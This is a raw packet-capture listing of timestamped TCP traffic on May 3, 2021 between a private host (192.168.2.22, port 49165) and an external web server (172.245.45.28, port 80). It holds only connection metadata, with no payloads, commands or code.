May 3, 2021 14:55:42.424918890 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424921036 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424933910 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424942017 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424951077 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424959898 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424977064 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.424978971 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424994946 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.424995899 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425014973 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425015926 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425034046 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425035000 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425054073 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425055981 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425071001 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425079107 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425090075 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425097942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425111055 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425115108 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425128937 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425132990 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425147057 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425151110 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425168037 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425169945 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425184965 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425189018 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425203085 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425204992 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425225019 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425225019 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425244093 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425244093 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425261974 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425265074 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425280094 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425297022 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425312996 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425329924 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425347090 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425365925 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425395012 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425414085 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425422907 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425431967 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425451040 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425467968 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425483942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425501108 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425503016 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425518990 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425525904 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425539017 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425556898 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425568104 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425571918 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425575018 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425592899 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425595045 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425611019 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425620079 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425628901 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425640106 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425646067 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425662041 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425664902 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425684929 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425693035 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425702095 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425710917 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425719023 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425734997 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425738096 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425753117 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425761938 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425770044 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425786972 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425789118 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425805092 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425812006 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425826073 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425837994 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425843000 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425854921 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425858974 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425878048 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425880909 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425894976 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.425904036 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425925970 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.425959110 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624288082 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624326944 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624346018 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624372959 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624396086 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624417067 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624439001 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624461889 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624483109 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624505043 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624516964 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624528885 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624550104 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624556065 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624567986 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624579906 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624584913 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624602079 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624602079 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624622107 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624624968 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624640942 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624646902 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624666929 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624669075 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624689102 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624691963 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624707937 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624715090 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624727964 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624739885 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624761105 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624763012 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624780893 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624783039 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624803066 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624804974 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624824047 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624829054 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624844074 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624850988 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624867916 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624872923 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624891996 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624893904 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624912977 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624917984 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624932051 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624939919 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624952078 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624960899 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624972105 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.624984026 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.624993086 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625005960 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625014067 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625029087 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625042915 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625050068 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625063896 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625071049 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625083923 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625094891 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625106096 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625117064 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625125885 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625139952 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625152111 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625171900 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.625880957 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625909090 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625931025 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625952959 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625976086 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.625988960 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626002073 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626008034 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626028061 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626029015 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626048088 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626053095 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626070976 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626077890 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626096964 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626102924 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626121044 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626127958 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626143932 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626152039 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626164913 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626178026 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626185894 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626205921 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626225948 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626231909 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626245022 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626255989 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626269102 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626283884 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626296043 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626311064 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626321077 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626334906 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626353979 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626360893 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626377106 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626389027 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626399040 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626415968 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626426935 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626441002 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626451015 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626466990 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626481056 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626492977 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626501083 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626518011 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626532078 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626543045 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626554012 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626568079 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626576900 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626595020 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626607895 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626622915 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626631021 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626652002 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626661062 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626677990 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626696110 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626702070 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626728058 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626729012 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626749039 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626753092 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626770973 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626777887 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626790047 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626802921 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626820087 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626828909 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626841068 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626856089 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626863956 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626880884 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626890898 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626904964 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626909971 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626929998 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626940966 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626955032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626960039 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.626977921 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.626991987 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627002954 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627012014 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627029896 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627038956 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627055883 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627072096 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627079010 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627089024 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627105951 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627114058 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627130032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627140999 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627155066 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627166033 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627178907 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627190113 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627203941 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627213001 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627230883 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627239943 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627254963 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627263069 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627278090 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627291918 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627302885 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627325058 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627327919 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627341986 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627352953 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627361059 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627377033 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627386093 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627401114 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627404928 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627428055 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627440929 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627453089 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627460957 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627476931 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627486944 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627504110 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627515078 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627528906 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627532959 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627552032 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627571106 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627576113 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627588987 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627599955 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627610922 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627625942 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627626896 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627650023 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627667904 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627674103 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627686024 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627697945 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627707005 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627722979 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627737999 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627747059 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627758026 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627770901 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627777100 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627794981 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627815962 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627820015 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627834082 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627844095 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627852917 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627868891 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627881050 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627893925 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627902985 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627918959 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627928972 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627943039 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627953053 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.627974987 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.627979994 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628000021 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628016949 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628024101 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628036022 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628048897 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628051996 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628072023 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628086090 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628098965 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628107071 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628123045 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628135920 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628146887 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628155947 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628171921 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628181934 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628196001 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628200054 CEST	49165	80	192.168.2.22	172.245.45.28
May 3, 2021 14:55:42.628220081 CEST	80	49165	172.245.45.28	192.168.2.22
May 3, 2021 14:55:42.628232002 CEST	49165	80	192.168.2.22	172.245.45.28
